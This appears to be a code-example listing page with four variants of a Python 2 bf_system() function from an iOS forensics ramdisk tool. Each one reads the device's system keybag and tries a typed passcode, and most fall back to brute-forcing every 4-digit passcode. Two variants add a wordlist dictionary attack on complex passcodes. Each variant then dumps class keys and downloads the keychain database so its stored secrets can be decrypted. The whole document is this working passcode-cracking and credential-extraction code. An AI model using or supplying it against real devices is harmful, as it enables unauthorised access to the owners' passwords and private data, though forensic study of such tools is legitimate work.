コード例 #1
0
def bf_system():
    client = RamdiskToolClient()
    di = client.getDeviceInfos()
    devicedir = di["udid"]
    if os.getcwd().find(devicedir) == -1:
        try:
            os.mkdir(devicedir)
        except:
            pass
        os.chdir(devicedir)
    key835 = di.get("key835").decode("hex")
    
    systembag = client.getSystemKeyBag()
    kbkeys = systembag["KeyBagKeys"].data
    kb = Keybag.createWithDataSignBlob(kbkeys, key835)
    keybags = di.setdefault("keybags", {})
    kbuuid = kb.uuid.encode("hex")
    print "Keybag UUID :", kbuuid
    if True and keybags.has_key(kbuuid) and keybags[kbuuid].has_key("passcodeKey"):
        print "We've already seen this keybag"
        passcodeKey = keybags[kbuuid].get("passcodeKey").decode("hex")
        print kb.unlockWithPasscodeKey(passcodeKey)
        kb.printClassKeys()
    else:
        keybags[kbuuid] = {"KeyBagKeys": systembag["KeyBagKeys"]}
        di["KeyBagKeys"] = systembag["KeyBagKeys"]
        di.save()
        print "Enter passcode or leave blank for bruteforce:"
        z = raw_input()
        res = client.getPasscodeKey(systembag["KeyBagKeys"].data, z)
        if kb.unlockWithPasscodeKey(res.get("passcodeKey").decode("hex")):
            print "Passcode \"%s\" OK" % z
            di.update(res)
            keybags[kbuuid].update(res)
            di.save()
            keychain_blob = client.downloadFile("/mnt2/Keychains/keychain-2.db")
            write_file("keychain-2.db", keychain_blob)
            print "Downloaded keychain database, use keychain_tool.py to decrypt secrets"
            return
        if z != "":
            print "Wrong passcode, trying to bruteforce !"
        if checkPasscodeComplexity(client) == 0:
            print "Trying all 4-digits passcodes..."
            bf = client.bruteforceKeyBag(systembag["KeyBagKeys"].data)
            if bf:
                di.update(bf)
                keybags[kbuuid].update(bf)
            print bf
            print kb.unlockWithPasscodeKey(bf.get("passcodeKey").decode("hex"))
            kb.printClassKeys()
            di["classKeys"] = kb.getClearClassKeysDict()
            di.save()
        else:
            print "Complex passcode used !"
            return
        
    #keychain_blob =    client.downloadFile("/private/var/Keychains/keychain-2.db")
    keychain_blob = client.downloadFile("/mnt2/Keychains/keychain-2.db")
    write_file("keychain-2.db", keychain_blob)
    print "Downloaded keychain database, use keychain_tool.py to decrypt secrets"
コード例 #2
0
def bf_system():
    client = RamdiskToolClient()
    di = client.getDeviceInfos()
    devicedir = di["udid"]
    if os.getcwd().find(devicedir) == -1:
        try:
            os.mkdir(devicedir)
        except:
            pass
        os.chdir(devicedir)
    key835 = di.get("key835").decode("hex")

    systembag = client.getSystemKeyBag()
    kbkeys = systembag["KeyBagKeys"].data
    kb = Keybag.createWithDataSignBlob(kbkeys, key835)
    keybags = di.setdefault("keybags", {})
    kbuuid = kb.uuid.encode("hex")
    print "Keybag UUID :", kbuuid
    if True and keybags.has_key(kbuuid) and keybags[kbuuid].has_key(
            "passcodeKey"):
        print "We've already seen this keybag"
        passcodeKey = keybags[kbuuid].get("passcodeKey").decode("hex")
        print kb.unlockWithPasscodeKey(passcodeKey)
        kb.printClassKeys()
    else:
        keybags[kbuuid] = {"KeyBagKeys": systembag["KeyBagKeys"]}
        di["KeyBagKeys"] = systembag["KeyBagKeys"]
        di.save()
        if checkPasscodeComplexity(client) == 0:
            print "Trying all 4-digits passcodes..."
            bf = client.bruteforceKeyBag(systembag["KeyBagKeys"].data)
            if bf:
                di.update(bf)
                keybags[kbuuid].update(bf)
            print bf
            print kb.unlockWithPasscodeKey(bf.get("passcodeKey").decode("hex"))
            kb.printClassKeys()
            di["classKeys"] = kb.getClearClassKeysDict()
            di.save()
        else:
            print "Complex passcode used !"
            return

    #keychain_blob =    client.downloadFile("/private/var/Keychains/keychain-2.db")
    keychain_blob = client.downloadFile("/mnt2/Keychains/keychain-2.db")
    write_file("keychain-2.db", keychain_blob)
    print "Downloaded keychain database, use keychain_tool.py to decrypt secrets"
コード例 #3
0
def bf_system():
    curdir = os.path.dirname(os.path.abspath(__file__))
    client = RamdiskToolClient()
    di = client.getDeviceInfos()
    devicedir = di["udid"]
    if os.getcwd().find(devicedir) == -1:
        try:
            os.mkdir(devicedir)
        except:
            pass
        os.chdir(devicedir)
    key835 = di.get("key835").decode("hex")

    systembag = client.getSystemKeyBag()
    kbkeys = systembag["KeyBagKeys"].data
    kb = Keybag.createWithDataSignBlob(kbkeys, key835)
    keybags = di.setdefault("keybags", {})
    kbuuid = kb.uuid.encode("hex")
    print "Keybag UUID :", kbuuid
    if True and keybags.has_key(kbuuid) and keybags[kbuuid].has_key("passcodeKey"):
        print "We've already seen this keybag"
        passcodeKey = keybags[kbuuid].get("passcodeKey").decode("hex")
        print kb.unlockWithPasscodeKey(passcodeKey)
        kb.printClassKeys()
    else:
        keybags[kbuuid] = {"KeyBagKeys": systembag["KeyBagKeys"]}
        di["KeyBagKeys"] = systembag["KeyBagKeys"]
        di.save()
        print "Enter passcode or leave blank for bruteforce:"
        z = raw_input()
        res = client.getPasscodeKey(systembag["KeyBagKeys"].data, z)
        if kb.unlockWithPasscodeKey(res.get("passcodeKey").decode("hex")):
            print 'Passcode "%s" OK' % z
            di.update(res)
            keybags[kbuuid].update(res)
            di.save()
            keychain_blob = client.downloadFile("/mnt2/Keychains/keychain-2.db")
            write_file("keychain-2.db", keychain_blob)
            # to fix the keychain downloading on iOS 7
            keychain_shm = client.downloadFile("/mnt2/Keychains/keychain-2.db-shm")
            write_file("keychain-2.db-shm", keychain_shm)
            keychain_wal = client.downloadFile("/mnt2/Keychains/keychain-2.db-wal")
            write_file("keychain-2.db-wal", keychain_wal)
            print "Downloaded keychain database, use keychain_tool.py to decrypt secrets"
            return
        if z != "":
            print "Wrong passcode, trying to bruteforce !"
        if kb.passcodeComplexity == 0:
            print "Trying all 4-digits passcodes..."
            bf = client.bruteforceKeyBag(systembag["KeyBagKeys"].data)
            if bf:
                di.update(bf)
                keybags[kbuuid].update(bf)
            print bf
            print kb.unlockWithPasscodeKey(bf.get("passcodeKey").decode("hex"))
            kb.printClassKeys()
            di["classKeys"] = kb.getClearClassKeysDict()
            di.save()
        else:
            print "Complex passcode used, trying dictionary attack ..."
            dictfile = os.path.join(curdir, "wordlist.dict")
            try:
                wordlist = open(dictfile, "r").readlines()
            except (OSError, IOError), e:
                exit(e)
            for line in wordlist:
                res = client.getPasscodeKey(systembag["KeyBagKeys"].data, line.rstrip("\n"))
                if kb.unlockWithPasscodeKey(res.get("passcodeKey").decode("hex")):
                    print 'Passcode "%s" OK' % line.rstrip("\n")
                    di.update(res)
                    keybags[kbuuid].update(res)
                    di.save()
                    keychain_blob = client.downloadFile("/mnt2/Keychains/keychain-2.db")
                    write_file("keychain-2.db", keychain_blob)
                    # to fix the keychain downloading on iOS 7
                    keychain_shm = client.downloadFile("/mnt2/Keychains/keychain-2.db-shm")
                    write_file("keychain-2.db-shm", keychain_shm)
                    keychain_wal = client.downloadFile("/mnt2/Keychains/keychain-2.db-wal")
                    write_file("keychain-2.db-wal", keychain_wal)

                    print "Downloaded keychain database, use keychain_tool.py to decrypt secrets"
                    return
            print "Passcode not found!"
            return
コード例 #4
0
def bf_system():
    curdir = os.path.dirname(os.path.abspath(__file__))
    client = RamdiskToolClient()
    di = client.getDeviceInfos()
    devicedir = di["udid"]
    if os.getcwd().find(devicedir) == -1:
        try:
            os.mkdir(devicedir)
        except:
            pass
        os.chdir(devicedir)
    key835 = di.get("key835").decode("hex")

    systembag = client.getSystemKeyBag()
    kbkeys = systembag["KeyBagKeys"].data
    kb = Keybag.createWithDataSignBlob(kbkeys, key835)
    keybags = di.setdefault("keybags", {})
    kbuuid = kb.uuid.encode("hex")
    print "Keybag UUID :", kbuuid
    if True and keybags.has_key(kbuuid) and keybags[kbuuid].has_key(
            "passcodeKey"):
        print "We've already seen this keybag"
        passcodeKey = keybags[kbuuid].get("passcodeKey").decode("hex")
        print kb.unlockWithPasscodeKey(passcodeKey)
        kb.printClassKeys()
    else:
        keybags[kbuuid] = {"KeyBagKeys": systembag["KeyBagKeys"]}
        di["KeyBagKeys"] = systembag["KeyBagKeys"]
        di.save()
        print "Enter passcode or leave blank for bruteforce:"
        z = raw_input()
        res = client.getPasscodeKey(systembag["KeyBagKeys"].data, z)
        if kb.unlockWithPasscodeKey(res.get("passcodeKey").decode("hex")):
            print "Passcode \"%s\" OK" % z
            di.update(res)
            keybags[kbuuid].update(res)
            di.save()
            keychain_blob = client.downloadFile(
                "/mnt2/Keychains/keychain-2.db")
            write_file("keychain-2.db", keychain_blob)
            print "Downloaded keychain database, use keychain_tool.py to decrypt secrets"
            return
        if z != "":
            print "Wrong passcode, trying to bruteforce !"
        if checkPasscodeComplexity(client) == 0:
            print "Trying all 4-digits passcodes..."
            bf = client.bruteforceKeyBag(systembag["KeyBagKeys"].data)
            if bf:
                di.update(bf)
                keybags[kbuuid].update(bf)
            print bf
            print kb.unlockWithPasscodeKey(bf.get("passcodeKey").decode("hex"))
            kb.printClassKeys()
            di["classKeys"] = kb.getClearClassKeysDict()
            di.save()
        else:
            print "Complex passcode used, trying dictionary attack ..."
            dictfile = os.path.join(curdir, 'wordlist.dict')
            try:
                wordlist = open(dictfile, 'r').readlines()
            except (OSError, IOError), e:
                exit(e)
            for line in wordlist:
                res = client.getPasscodeKey(systembag["KeyBagKeys"].data,
                                            line.rstrip('\n'))
                if kb.unlockWithPasscodeKey(
                        res.get("passcodeKey").decode("hex")):
                    print "Passcode \"%s\" OK" % line.rstrip('\n')
                    di.update(res)
                    keybags[kbuuid].update(res)
                    di.save()
                    keychain_blob = client.downloadFile(
                        "/mnt2/Keychains/keychain-2.db")
                    write_file("keychain-2.db", keychain_blob)
                    print "Downloaded keychain database, use keychain_tool.py to decrypt secrets"
                    return
            print "Passcode not found!"
            return